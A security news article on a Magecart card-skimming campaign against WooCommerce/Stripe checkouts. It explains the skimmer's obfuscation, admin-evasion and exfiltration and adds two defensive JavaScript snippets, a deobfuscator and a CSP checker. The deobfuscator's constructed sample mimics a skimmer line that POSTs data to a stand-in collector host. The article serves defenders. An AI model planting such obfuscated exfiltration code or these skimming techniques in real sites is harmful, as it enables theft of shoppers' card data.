👤 AUDITWOLF
🗓️ 14 Jan 2026  

Checkout, Cash Out: Inside the Stealthy Magecart Heist Targeting Online Shoppers Worldwide

Subtitle: A cunning Magecart campaign is siphoning credit card data from e-commerce sites by mimicking trusted payment gateways - leaving both merchants and customers at risk.

The digital checkout line is supposed to be where shopping journeys end in satisfaction. But for hundreds of online stores and their unsuspecting customers, it’s become the scene of a silent cybercrime. Since early 2022, a sophisticated Magecart group has been quietly looting credit card data from e-commerce sites, using fake payment forms so convincing even the wary have been fooled. The attackers’ weapon of choice? A malicious script that blends seamlessly with trusted checkout pages - until your money, and your trust, are gone.

Fast Facts

  • Magecart attackers are stealing credit card data from e-commerce checkout pages via fake payment forms.
  • The campaign targets WooCommerce sites using Stripe, affecting major card brands like Mastercard, Amex, and JCB.
  • Attackers use advanced obfuscation and anti-detection techniques, including hiding from site administrators.
  • Stolen data is exfiltrated to remote servers, often after a fake payment error prompts users to re-enter details.
  • Experts urge tighter controls: CSPs, regular updates, strong authentication, and non-admin testing of checkout flows.

The Anatomy of a Digital Heist

This latest Magecart campaign is as insidious as it is clever. By injecting malicious JavaScript into the checkout pages of WooCommerce-powered stores, the attackers replace legitimate payment forms - specifically those using the Stripe gateway - with a fake, pixel-perfect replica. The fraudulent form automatically detects card brands, displays the correct logos, and even mimics Stripe’s validation features, making it nearly indistinguishable from the real thing.

When a shopper enters their payment information, the skimmer intercepts the data before it ever reaches the real payment processor. The stolen card details are then sent to an attacker-controlled server, such as Lasorie[.]com, before the malicious code wipes its tracks and reloads the genuine form. To sow further confusion, the victim is often met with a payment error, nudging them to try again - doubling the attackers’ haul.

The operation employs a suite of technical tricks to avoid discovery. The JavaScript is hidden behind layers of obfuscation, including string concatenation, base64 encoding, and even XOR encryption with a hardcoded key. The code leverages deep knowledge of WordPress and WooCommerce internals, using the wp_enqueue_scripts function to slip into the site’s workflow. It also checks for the presence of the WordPress Admin Bar, removing itself if an administrator is detected - ensuring it remains invisible during routine site maintenance.
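
For analysts triaging a suspect checkout script, the three string-hiding layers described above can be peeled mechanically. The following is an added example, not code from the campaign or from the researchers; the key `k3y`, the `.example` URL and the sample script are constructed for illustration.

```javascript
// Added example, not code from the campaign: peel the three string-hiding
// layers named above (concatenation, base64, XOR with a hardcoded key) and
// report any URL that falls out. Key, URL and script are constructed.

function xorBytes(bytes, key) {
  const k = Buffer.from(key, 'utf8');
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ k[i % k.length];
  return out;
}

// Layer 1: fold 'ab' + "cd" into "abcd" until the source stops changing.
function foldConcat(src) {
  const pair = /(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, q1, a, q2, b) => JSON.stringify(a + b));
  } while (src !== prev);
  return src;
}

const literals = src => [...src.matchAll(/(["'])([^"'\\]*)\1/g)].map(m => m[2]);
const B64 = /^(?:[A-Za-z0-9+/]{4}){3,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;
const URLISH = /^https?:\/\/[a-z0-9.-]+\.[a-z]{2,}(?:\/[\x21-\x7e]*)?$/i;

// Layers 2 and 3: base64-decode each long literal, then try it as-is and
// XORed with every short literal in the script (a hardcoded key is one of them).
function findHiddenUrls(script) {
  const lits = literals(foldConcat(script));
  const blobs = lits.filter(s => B64.test(s));
  const keys = [null, ...lits.filter(s => s && s.length <= 16 && !blobs.includes(s))];
  const hits = [];
  for (const blob of blobs) {
    const raw = Buffer.from(blob, 'base64');
    for (const key of keys) {
      const text = (key ? xorBytes(raw, key) : raw).toString('latin1');
      if (URLISH.test(text)) hits.push({ url: text, key });
    }
  }
  return hits;
}

// Constructed sample: URL on a reserved .example host, XOR key 'k3y'.
const enc = xorBytes(Buffer.from('https://collector.example/c'), 'k3y').toString('base64');
const SAMPLE = `var k='k3y';var u='${enc.slice(0, 9)}'+"${enc.slice(9, 20)}" + '${enc.slice(20)}';send(d(u,k),'POST');`;

console.log(findHiddenUrls(SAMPLE));
```

Any URL this recovers from a script on a checkout page that is not a known payment or analytics endpoint is a lead worth escalating.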

While the attackers have left digital breadcrumbs - such as domains like cdn-cookie[.]com and other Magecart-linked infrastructure - security researchers say the campaign’s persistence and adaptability set it apart. Some infected sites have even displayed visible bugs, a rare crack in an otherwise polished operation.

Defending the Checkout Lane

The fallout is far-reaching: online shoppers face direct financial loss and risk of fraud, while businesses must grapple with reputational damage and regulatory penalties. Experts recommend e-commerce administrators deploy robust Content Security Policies (CSP) to block unauthorized JavaScript, keep all platforms and plugins up to date, enforce multi-factor authentication, and - crucially - test checkout processes from the perspective of ordinary users, not just administrators. Silent Push researchers note that unexplained payment errors and suspicious checkout behavior may be early warning signs of compromise.
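
To make the CSP recommendation concrete, the added example below (not from the article or the researchers) checks a permissive and a restrictive policy against the two requests a skimmer of this kind needs: loading its script and sending the stolen data out. The shop and attacker hosts are constructed `.example` names, and the Stripe hosts are assumed from Stripe's published CSP guidance for Stripe.js and should be verified against the current documentation.

```javascript
// Added example, not from the article: which skimmer-style requests would a
// checkout page's CSP allow? All hosts ending in .example are constructed.

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Simplified source matching: '*', 'self', scheme://host and *.host only.
// Nonces, hashes, paths and ports are out of scope and never match here.
function sourceMatches(src, url, self) {
  if (src === '*') return true;
  if (src === "'self'") return url.origin === self.origin;
  const m = /^(?:(https?):\/\/)?(\*\.)?([a-z0-9.-]+)$/i.exec(src);
  if (!m) return false;
  if (m[1] && url.protocol !== m[1].toLowerCase() + ':') return false;
  const host = m[3].toLowerCase();
  return m[2] ? url.hostname.endsWith('.' + host) : url.hostname === host;
}

function allows(policy, directive, target, site) {
  const sources = policy.get(directive) ?? policy.get('default-src');
  if (!sources) return true; // nothing restricts this request type
  const url = new URL(target), self = new URL(site);
  return sources.some(s => sourceMatches(s, url, self));
}

const SITE = 'https://shop.example';
const REQUESTS = [
  ['stripeJs',       'script-src',  'https://js.stripe.com/v3/'],
  ['injectedRemote', 'script-src',  'https://static.skimmer.example/pay.js'],
  ['injectedLocal',  'script-src',  SITE + '/assets/pay.js'],
  ['stripeApi',      'connect-src', 'https://api.stripe.com/v1/tokens'],
  ['exfil',          'connect-src', 'https://collector.example/c'],
];

function audit(header) {
  const policy = parseCsp(header);
  return Object.fromEntries(REQUESTS.map(([id, dir, url]) => [id, allows(policy, dir, url, SITE)]));
}

const WEAK = "default-src * 'unsafe-inline' 'unsafe-eval'";
const HARDENED = "default-src 'self'; script-src 'self' https://js.stripe.com; " +
  "frame-src https://js.stripe.com https://hooks.stripe.com; " +
  "connect-src 'self' https://api.stripe.com";

console.log({ weak: audit(WEAK), hardened: audit(HARDENED) });
```

Under the restrictive policy a script served from the shop's own origin still passes `script-src 'self'`, so in this sample it is the `connect-src` restriction that stops the outbound request; CSP complements, and does not replace, integrity monitoring of the site's own files.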

The New Normal?

The Magecart threat is not new, but it is evolving - constantly raising the bar for both attackers and defenders. As online shopping continues to surge, so too does the digital arms race at the checkout. In this game, vigilance is the only safe bet.

WIKICROOK

  • Magecart: Magecart is a group of hackers who inject malicious code into online checkout pages to steal customers’ credit card information during transactions.
  • Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.
  • Content Security Policy (CSP): Content Security Policy (CSP) is a set of website rules that controls what content can load, helping block malicious scripts and unauthorized elements.
  • WooCommerce: WooCommerce is a popular WordPress plugin that enables users to add customizable e-commerce features and sell products directly from their websites.
  • Skimmer: A skimmer is a device or software that secretly captures payment card details during legitimate transactions, often used by criminals for fraud.